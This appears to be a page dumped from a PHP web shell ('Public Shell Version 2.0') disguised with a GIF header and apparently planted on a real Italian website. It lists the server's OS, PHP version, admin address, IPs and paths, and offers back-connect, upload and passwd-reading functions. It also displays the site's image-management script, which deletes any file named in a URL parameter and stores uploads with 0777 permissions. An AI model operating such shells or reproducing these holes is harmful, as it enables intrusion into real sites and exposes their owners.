GIF89a

Public Shell


Uname : Linux hlpi1ws-c319s07.ad.aruba.it 5.15.0-130-generic #140-Ubuntu SMP Wed Dec 18 17:59:53 UTC 2024 x86_64
PHP Version : 5.3.29
Server Admin : postmaster@www.giancio.com
Server IP : 192.168.3.109 Your IP : 18.188.15.246
Safe Mode : Safe Mode is OFF
Read etc/passwd : Disabled Functions : PHP INFO
Back Connect
IP : PORt :
'; Public Shell Version 2.0
Disable Functions: system,popen,dl,passthru,proc_open,shell_exec
Current Path : /web/htdocs/www.giancio.com/home/admin/function/
File Upload :
Current File : /web/htdocs/www.giancio.com/home/admin/function/img.php

<?php

function listimg() {
	
	
	$out = 	'<div class="row">
					<div class="col-md-6">
						<div class="headline">
							<h3>' . LISTA . ' ' . PIC . '</h3> 
						</div>
					</div>					 
					<div class="col-md-6"> 
						<a href="?azione=uploadimg" class="btn btn-default pull-right"><i class="icon-plus"></i> Inserisci</a>
					</div>		
				</div>'; 
		

	$out .= '<div class="row">		
					<div class="col-md-12">
						<div class="table-wrapper">

				    		<div class="wrapper-panel">     
				    		<table class="table table-striped" id="tab" > 
				      			<thead>
									<tr>
									    <th>' . PATH . '</th>	
									    <th>File</th>	 
									    <th width="5%"></th>	
									</tr>
								</thead>
				      			<tbody>';
	$img = opendir('../upimg/');
	while ($file = readdir($img)) {
		$file_array[] = $file;
	}

	foreach ($file_array as $file) {
		if ($file == ".." || $file == ".") {
			continue;
		}
		$out .= '<tr>
					<td>upimg/' . $file . '</td>
					<td>
						<a href="../upimg/' . $file . '" title="' . $file . '" data-rel="fancybox-button" class="thumbnail fancybox-button zoomer">
		                    <span class="overlay-zoom">  
		                        <img class="img-responsive" src="../upimg/' . $file . '" width="30px" alt="' . $file . '">
		                                        
		                    </span>                                              
		                </a>						
						
						
						
						
						
						
						
					</td>
					<td>
					<a class="show-option" title="' . DELETE . '" href="index.php?azione=delimg&delete=' . $file . '" onClick="return confirm(\'Sei sicuro di voler eliminare questo elemento?\');">
					<i class="icon-remove-sign"></i>
					</a>
					</td>
				</tr>';
		//questo crea il link
	}
	$out .= '</tbody></table>';			      							

$out .='			</div>
			    			<div class="wrapper-paging pull-right">
			      				<ul>
									<li><a class="paging-back">&lt;</a></li>
									<li><a class="paging-this">Pagina <strong>0</strong> di <span>x</span></a></li>
									<li><a class="paging-next">&gt;</a></li>
								</ul>
			    			</div>	<br /><br /> 		
	    </div>	 
	</div>
</div>';
	

	return ($out);
}

function delimg() {
	define('IMAGE_DIR', '../upimg');
	$immagine = IMAGE_DIR . '/' . $_GET['delete'];
	if (!unlink($immagine)) {
		echo("Impossibile eliminare $immagine <br>");
	} else {
		header('location: cms.php?del&azione=listimg');
	}
	echo("<br><a href=index.php?azione=listimg>Torna Indietro</a><br>");
}

function uploadimg() { 
		global $conn, $id;
		
	$output = '<div class="row">
					<div class="col-md-10">
						<div class="headline">
							<h3>'.ADD.' '.PIC.'</h3>
						</div>
					</div> 
					
					<div class="col-md-2">
						<a class="btn btn-default pull-right" href="javascript:history.back()"><i class="icon-reply"></i> Torna indietro</a>
					</div>

				</div>';

	$output .= '<div class="row">
				<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=saveimg&id=' . $id . '" method="post">
					<div class="col-md-4">
						<p>JPG, BMP, PNG, GIF, TGA - Max 2MB</p>
						<br /><br /><input type="file" id="upimg" name="upimg" /><br /><br />
						<button class="btn btn-default" type="submit">Salva</button><br /><br />
					</div>	
				</form>
				</div>';
		

		return ($output);

	
}

function saveimg() {
	global $conn;
	$dimensione_massima = 2048000;
	//dimensione massima consentita per file in byte -> 1024 byte = 1 Kb
	$dimensione_massima_Kb = $dimensione_massima / 1024;
	$cartella_upload = "../upimg/";
	//cartella in cui eseguire l'upload (controllare permessi scrittura)
	// percorso cartella relativo $cartella_upload="../public/";
	$filtrare = 1;
	//filtrare x estensioni ammesse? 1=si 0=no
	$array_estensioni_ammesse = array('.jpg', '.jpeg', '.bmp', '.png', '.gif', '.tga'); 
	//estensioni ammesse
	$errore = false;
	if (!isset($_FILES['upimg']) || $_FILES['upimg']['size'] == 0) {

		$errore = '' . ERRNOFILE . '';
		header('location: cms.php?errnofile&azione=uploadimg');

	} elseif ($_FILES['upimg']['size'] > $dimensione_massima) {
		$errore = '' . ERRDIM_2 . ' ' . $dimensione_massima_Kb . ' Kb';
		header('location: cms.php?errdim_2&azione=uploadimg');
	} else {
		$nome_file = $_FILES['upimg']['name'];
		$errore = "";
		if ($filtrare == 1) {
			$estensione = strtolower(substr($nome_file, strrpos($nome_file, "."), strlen($nome_file) - strrpos($nome_file, ".")));
			if (!in_array($estensione, $array_estensioni_ammesse)) {
				$errore = '' . ERREXT_IMG . '';
				header('location: cms.php?errext_img&azione=uploadimg');
			}
		}
		if (!file_exists($cartella_upload)) {
			$errore .= "La cartella di destinazione non esiste</br>";
		}

		if ($errore == "") {
			if (move_uploaded_file($_FILES['upimg']['tmp_name'], $cartella_upload . $_FILES['upimg']['name'])) {
				chmod(/*$cartella_upload . */$_FILES['upimg']['name'], 0777);
				//permessi per poterci sovrascrivere/scaricare

				header('location: cms.php?ins&azione=listimg');
			} else {
				echo "error";
			}
		} else {
			echo $errore;
		}
	}
}

?>

Public Shell Version 2.0